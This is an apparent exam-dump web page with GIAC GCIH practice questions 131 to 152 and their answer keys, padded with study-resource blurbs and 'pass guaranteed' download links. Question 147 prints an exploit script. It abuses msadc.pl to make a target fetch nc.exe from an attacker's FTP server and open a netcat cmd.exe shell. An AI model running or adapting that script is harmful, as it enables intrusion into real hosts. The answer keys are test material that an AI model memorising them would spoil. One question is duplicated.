[Oct-2021] Free GCIH Exam Questions GCIH Actual Free Exam Questions [Q131-Q152]


Verified GCIH dumps and 335 unique questions


Preparation Resources for GCIH Certification Test

A candidate who identifies and uses a range of preparation resources has a better chance of passing the GIAC GCIH exam than one who does not. Those who want to clear the GCIH test can therefore use the following training resources:

  • SEC504: Hacker Tools, Techniques, Exploits, and Incident Handling

    This training course lasts six days and can be taken either online or in a classroom. It is taught by Michael Murr as Principal Instructor and Joshua Wright as Fellow. During this official class, candidates learn about the following concepts:

    • Preparing most effectively to prevent a security breach;
    • Developing reactive and preventive defense methods;
    • Identifying active attacks immediately and understanding the resulting compromises;
    • Understanding how to stop different types of computer attack vectors;
    • Developing measures that block attackers from returning;
    • Learning how to recover from attacks and restore systems to avoid business disruption;
    • Using different hacking tools and techniques and understanding how they work;
    • Developing strategies that help prevent hacking attacks;
    • Discovering vulnerabilities, defenses, and attacks;
    • Understanding how to handle the legal issues that arise in incident handling.
  • GCIH GIAC Certified Incident Handler All-in-One Exam Guide, 1st Edition

    This book was written by Nick Mitropoulos and is available on Amazon in several formats: Kindle for $34.67 or paperback for $36.49. It helps you prepare for the challenging exam required for the GIAC Certified Incident Handler certification and presents the material according to the exam blueprint. The author is a reputable cybersecurity expert who knows the tips and tricks candidates should keep in mind when they take the GCIH exam. The book also includes 300 practice questions that let exam-takers get used to the exam's structure and difficulty level. In particular, it covers the following topics:

    • Incident handling and intrusion analysis;
    • Ways to gather different types of information;
    • How to identify vulnerabilities through scanning and enumeration;
    • Means of exploiting vulnerabilities;
    • Preventing and defending against endpoint and infrastructure attacks;
    • Managing and defending against network, web application, and DoS attacks;
    • How attackers cover their tracks and evade detection;
    • Understanding botnets, bots, and worms.

    Another advantage of this material is that each chapter ends with a detailed explanation of the exam domains and places candidates in real-world scenarios, so exam-takers consolidate their skills and gain practical experience.

 

NEW QUESTION 131
You work as a Senior Marketing Manager for Umbrella Inc. You find that some of the software applications on the systems are malfunctioning and that you cannot access your remote desktop session. You suspect that a malicious attack was performed on the company's network. You immediately call the incident response team to handle the situation, and they ask the Network Administrator for all relevant information about the malfunction. The Network Administrator informs the incident response team that he was reviewing the security of the network, which caused all these problems. The incident response team announces that this was a controlled event, not an incident.
Which of the following steps of the incident handling process was performed by the incident response team?

  • A. Containment
  • B. Identification
  • C. Eradication
  • D. Preparation

Answer: B

Explanation:
Section: Volume C

 

NEW QUESTION 132
You are concerned about rootkits on your network communicating with attackers outside your network. Without using an IDS, how can you detect this sort of activity?

  • A. By examining your firewall logs.
  • B. By examining your domain controller server logs.
  • C. By setting up a DMZ.
  • D. You cannot, you need an IDS.

Answer: A

 

NEW QUESTION 133
Which of the following tools is described in the statement given below?
"It has a database containing signatures to be able to detect hundreds of vulnerabilities in UNIX, Windows, and commonly used web CGI scripts. Moreover, the database detects DDoS zombies and Trojans as well."

  • A. Anti-x
  • B. SARA
  • C. Nmap
  • D. Nessus

Answer: D

 

NEW QUESTION 134
Which of the following malicious software travels across computer networks without the assistance of a user?

  • A. Virus
  • B. Worm
  • C. Trojan horses
  • D. Hoax

Answer: B

 

NEW QUESTION 135
Which of the following viruses is a script that attaches itself to a file or template?

  • A. E-mail virus
  • B. Macro virus
  • C. Trojan horse
  • D. Boot sector

Answer: B

 

NEW QUESTION 136
The Klez worm is a mass-mailing worm that exploits a vulnerability to open an executable attachment even in Microsoft Outlook's preview pane. The Klez worm gathers email addresses from the entries of the default Windows Address Book (WAB). Which of the following registry values can be used to identify this worm?

  • A. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
  • B. HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4\Wab File Name = "file and pathname of the WAB file"
  • C. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
  • D. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Answer: B

 

NEW QUESTION 137
Adam, a malicious hacker, is running a scan. The statistics of the scan are as follows:

Scan directed at open port:
Client                                   Server
192.5.2.92:4079 ---------FIN---------> 192.5.2.110:23
192.5.2.92:4079 <----NO RESPONSE------ 192.5.2.110:23

Scan directed at closed port:
Client                                   Server
192.5.2.92:4079 ---------FIN---------> 192.5.2.110:23
192.5.2.92:4079 <-----RST/ACK--------- 192.5.2.110:23

Which of the following types of port scan is Adam running?

  • A. Idle scan
  • B. XMAS scan
  • C. ACK scan
  • D. FIN scan

Answer: D

 

NEW QUESTION 138
John works as an Ethical Hacker for PassGuide Inc. He wants to find out which ports are open on PassGuide's server using a port scanner. However, he does not want to establish a full TCP connection.
Which of the following scanning techniques will he use to accomplish this task?

  • A. TCP FIN
  • B. Xmas tree
  • C. TCP SYN/ACK
  • D. TCP SYN

Answer: D

 

NEW QUESTION 139
Adam works as a Security Administrator for Umbrella Technology Inc. He reported a breach in security to his senior members, stating that "security defenses have been breached and exploited for 2 weeks by hackers." The hackers had accessed and downloaded 50,000 records containing customer credit card numbers and passwords. Umbrella Technology was looking to law enforcement officials to protect its intellectual property.
The intruder entered through an employee's home machine, which was connected to Umbrella Technology's corporate VPN network. An application called the BEAST Trojan was used in the attack to open a "back door" that gave the hackers undetected access. The security breach was discovered when customers complained about their credit cards being used without their knowledge.
The hackers were traced back to Shanghai, China, through e-mail address evidence; the credit card information had been sent to that same e-mail address. The passwords allowed the hackers to access Umbrella Technology's network from a remote location, posing as employees.
Which of the following actions can Adam take to prevent such attacks from occurring in the future?

  • A. Replace the VPN access with dial-up modem access to the company's network
  • B. Apply different security policy to make passwords of employees more complex
  • C. Disable VPN access to all employees of the company from home machines
  • D. Allow VPN access but replace the standard authentication with biometric authentication

Answer: C

Explanation:
Section: Volume C

 

NEW QUESTION 140
Maria works as the Chief Security Officer for PassGuide Inc. She wants to send secret messages to the CEO of the company. To secure these messages, she uses a technique of hiding a secret message within an ordinary message. The technique provides 'security through obscurity'. What technique is Maria using?

  • A. Public-key cryptography
  • B. Encryption
  • C. Steganography
  • D. RSA algorithm

Answer: C

 

NEW QUESTION 141
Which of the following provides packet-level encryption between hosts in a LAN?

  • A. PFS
  • B. Tunneling protocol
  • C. PPTP
  • D. IPsec

Answer: D

 

NEW QUESTION 142
Which of the following is the difference between SSL and S-HTTP?

  • A. SSL operates at the application layer and S-HTTP operates at the network layer.
  • B. SSL operates at the application layer and S-HTTP operates at the transport layer.
  • C. SSL operates at the network layer and S-HTTP operates at the application layer.
  • D. SSL operates at the transport layer and S-HTTP operates at the application layer.

Answer: D

Explanation:
Section: Volume C

 

NEW QUESTION 143
You work as a Network Administrator for InformSec Inc. You find that TCP port 23476 is open on your server. You suspect that a Trojan named Donald Dick may be installed on your server, and you want to verify whether it is installed or not. For this, you want to know the process listening on port 23476, along with its process ID, process name, and the path of the process on your server. Which of the following applications will you most likely use to accomplish the task?

  • A. SubSeven
  • B. Tripwire
  • C. Netstat
  • D. Fport

Answer: D

Explanation:
Section: Volume A

 

NEW QUESTION 144
In which of the following attacks does an attacker create the IP packets with a forged (spoofed) source IP address with the purpose of concealing the identity of the sender or impersonating another computing system?

  • A. Polymorphic shell code attack
  • B. Cross-site request forgery
  • C. IP address spoofing
  • D. Rainbow attack

Answer: C

 

NEW QUESTION 145
Which of the following viruses/worms uses the buffer overflow attack?

  • A. Chernobyl (CIH) virus
  • B. Klez worm
  • C. Nimda virus
  • D. Code red worm

Answer: D

 

NEW QUESTION 146
What is the major difference between a worm and a Trojan horse?

  • A. A worm spreads via e-mail, while a Trojan horse does not.
  • B. A Trojan horse is a malicious program, while a worm is an anti-virus software.
  • C. A worm is a form of malicious program, while a Trojan horse is a utility.
  • D. A worm is self replicating, while a Trojan horse is not.

Answer: D

 

NEW QUESTION 147
Adam, a malicious hacker, runs the exploit given below:

#####################################################
$port = 53;
# Spawn cmd.exe on port X
$your = "192.168.1.1";   # Your FTP Server 89
$user = "Anonymous";     # login as
$pass = '[email protected]';   # password
#####################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n";
system("perl msadc.pl -h $host -C \"echo open $your >sasfile\"");
system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo $pass>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get hacked.html>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo quit>>sasfile\"");
print "Server is downloading ...\n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\"");
print "Press ENTER when download is finished ... (Have a ftp server)\n";
$o = <STDIN>;
print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");
print "Done.\n";
#system("telnet $host $port");
exit(0);

Which of the following is the expected result of the above exploit?

  • A. Creates a share called "sasfile" on the target system
  • B. Creates an FTP server with write permissions enabled
  • C. Opens up a SMTP server that requires no username or password
  • D. Opens up a telnet listener that requires no username or password

Answer: D

 

NEW QUESTION 148
John works as an Ethical Hacker for PassGuide Inc. He wants to find out which ports are open on PassGuide's server using a port scanner. However, he does not want to establish a full TCP connection.
Which of the following scanning techniques will he use to accomplish this task?

  • A. TCP FIN
  • B. Xmas tree
  • C. TCP SYN/ACK
  • D. TCP SYN

Answer: D

Explanation:
Section: Volume C

 

NEW QUESTION 149
Which of the following protocol loggers is used to detect ping sweep?

  • A. lppi
  • B. ippl
  • C. pitl
  • D. dpsl

Answer: B

 

NEW QUESTION 150
Which of the following programming languages are NOT vulnerable to buffer overflow attacks?
Each correct answer represents a complete solution. Choose two.

  • A. Perl
  • B. C++
  • C. Java
  • D. C

Answer: A,C

 

NEW QUESTION 151
Which of the following are based on malicious code?
Each correct answer represents a complete solution. Choose two.

  • A. Worm
  • B. Biometrics
  • C. Trojan horse
  • D. Denial-of-Service (DoS)

Answer: A,C

 

NEW QUESTION 152
......

Latest 100% Passing Guarantee - Brilliant GCIH Exam Questions PDF: https://www.torrentvce.com/GCIH-valid-vce-collection.html

GCIH Dumps for Pass Guaranteed - Pass GCIH Exam: https://drive.google.com/open?id=1NQ9pOfU7j8dcwzKkkbPwPXhl37gOU5Uf